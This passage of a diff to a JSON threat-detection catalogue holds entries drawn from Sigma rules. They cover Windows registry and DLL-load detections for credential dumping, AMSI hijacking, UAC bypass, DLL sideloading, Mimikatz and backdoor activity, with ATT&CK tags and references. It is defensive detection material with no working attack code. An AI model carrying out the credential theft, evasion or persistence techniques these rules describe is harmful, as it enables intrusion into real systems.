Modification" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "registry_set_new_network_provider.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "value": "New Network Provider - Registry" + }, + { + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_disable_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": 
"e2482f8d-3443-4237-b906-cc145d87a076", + "value": "Disable Internal Tools or Feature in Registry" + }, + { + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_amsi_com_hijack.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/", + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "160d2780-31f7-4922-8b3a-efce30e63e96", + "value": "Potential AMSI COM Server Hijacking" + }, + { + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate registration of IFilters by the OS or software" + ], + "filename": "registry_set_ifilter_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1468548924600459267", + "https://persistence-info.github.io/Data/ifilters.html", + "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", + "value": "Register New IFiltre For Persistence" + }, + { + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_vbs_payload_stored.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", + "value": "VBScript Payload Stored in Registry" + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_persistence_typed_paths.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://forensafe.com/blogs/typedpaths.html", + "https://twitter.com/dez_/status/1560101453150257154", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", + "value": "Persistence Via TypedPaths" + }, + { + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Administrative scripts", + "Installation of a service" + ], + "filename": "registry_set_servicedll_hijack.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "value": "ServiceDll Hijack" + }, + { + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "meta": { + "author": "Den Iuzvyk", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_abusing_azure_browser_sso.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" + ] + }, + "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "value": "Abusing Azure Browser SSO" + }, + { + "description": "Detects any assembly DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "value": "dotNET DLL Loaded Via Office Applications" + }, + { + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, 
etc).", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/17", + "falsepositive": [ + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + ], + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dez_/status/986614411711442944", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ] + }, + "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "value": "WMIC Loading Scripting Libraries" + }, + { + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "meta": { + "author": "frack113", + "creation_date": "2022/12/31", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_lolbin_coregen.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_lolbin_coregen.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1055" + ] + }, + "uuid": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "value": "Potential DLL Sideloading Using Coregen.exe" + }, + { + "description": "Detects 
the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Other DLLs with that import hash" + ], + "filename": "image_load_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "49329257-089d-46e6-af37-4afce4290685", + "value": "SharpEvtMute Imphash EvtMuteHook Load" + }, + { + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "meta": { + "author": "Nasreddine Bencherchali, Subhash Popuri (@pbssubhash)", + "creation_date": "2022/12/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_side_load_comctl32.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/binderlabs/DirCreate2System", + "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6360757a-d460-456c-8b13-74cf0e60cceb", + "value": "Potential DLL Sideloading Via comctl32.dll" + }, + { + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], 
+ "filename": "image_load_wsman_provider_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/bohops/WSMan-WinRM", + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "value": "Suspicious WSMAN Provider Image Loads" + }, + { + "description": "Detects DSParse DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dsparse_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "value": "Active Directory Parsing DLL Loaded Via Office Applications" + }, + { + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "meta": { + "author": "Markus Neis, @markus_neis", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_ps_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": 
"windows", + "refs": [ + "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "value": "Image Load of VSS_PS.dll by Uncommon Executable" + }, + { + "description": "Attempts to load dismcore.dll after dropping it", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/06", + "falsepositive": [ + "Actions of a legitimate telnet client" + ], + "filename": "image_load_uac_bypass_via_dism.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" + ] + }, + "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", + "value": "UAC Bypass With Fake DLL" + }, + { + "description": "Detects processes loading modules related to PCRE.NET package", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_pcre_net_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, - "uuid": 
"57b649ef-ff42-4fb0-8bf6-62da243a1708", - "value": "Windows Defender Threat Detected" + "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "value": "PCRE.NET Package Image Load" }, { - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "description": "Detects any GAC DLL being loaded by an Office Product", "meta": { - "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", - "creation_date": "2017/08/22", + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "value": "GAC DLL Loaded Via Office Applications" + }, + { + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_uac_bypass_iscsicpl.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1547583317410607110", + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", + "value": "UAC Bypass Using Iscsicpl - ImageLoad" + }, + { + "description": "Detects CLR DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "value": "CLR DLL Loaded Via Office Applications" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_pingback_backdoor.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "value": "Pingback Backdoor - Image" + }, + { + "description": "Detects certain DLL loads when Mimikatz gets executed", + "meta": { + "author": "sigma", + 
"creation_date": "2017/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_mimikatz_inmemory_detection.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ] + }, + "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "value": "Mimikatz In-Memory" + }, + { + "description": "Detects WMI command line event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], - "filename": "win_wmi_persistence.yml", + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "value": "WMI Persistence - Command Line Event Consumer" + }, + { + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "FP could occure if the legitimate version of vmGuestLib already exists on the system" + ], + "filename": "image_load_side_load_vmguestlib.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "value": "VMGuestLib DLL Sideload" + }, + { + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usualy to achieve techniques such as UAC bypass and privilege escalation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_non_existent_dlls.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "value": "Sideloading Of Non-Existent DLLs From System Folders" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_web_browsers.yml", + "level": "medium", + 
"logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "value": "Web Browsers DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbgcore_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "value": "DLL Sideloading Of DBGCORE.DLL" + }, + { + "description": "Detects the image load of VSS DLL by uncommon executables", + "meta": { + "author": "frack113", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/ORCx41/DeleteShadowCopies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "value": "Image Load of VSS 
Dll by Uncommon Executable" + }, + { + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "meta": { + "author": "frack113", + "creation_date": "2022/12/14", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_jsschhlp.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", + "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "value": "Potential DLL Sideloading Via JsSchHlp" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "value": "SILENTTRINITY Stager Execution - DLL" + }, + { + "description": "A General detection for processes loading System.Drawing.ni.dll. 
This could be an indicator of potential Screen Capture.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_system_drawing_load.yml", + "level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", + "value": "Suspicious System.Drawing Load" + }, + { + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + ], + "filename": "image_load_side_load_from_non_system_location.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://hijacklibs.net/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + 
"attack.t1574.002" + ] + }, + "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "value": "System DLL Sideloading From Non System Locations" + }, + { + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unikely" + ], + "filename": "image_load_susp_cmstp.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", + "value": "Cmstp Suspicious DLL Load" + }, + { + "description": "Detects Kerberos DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_kerberos_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "value": "Active Directory Kerberos DLL Loaded Via Office Applications" + 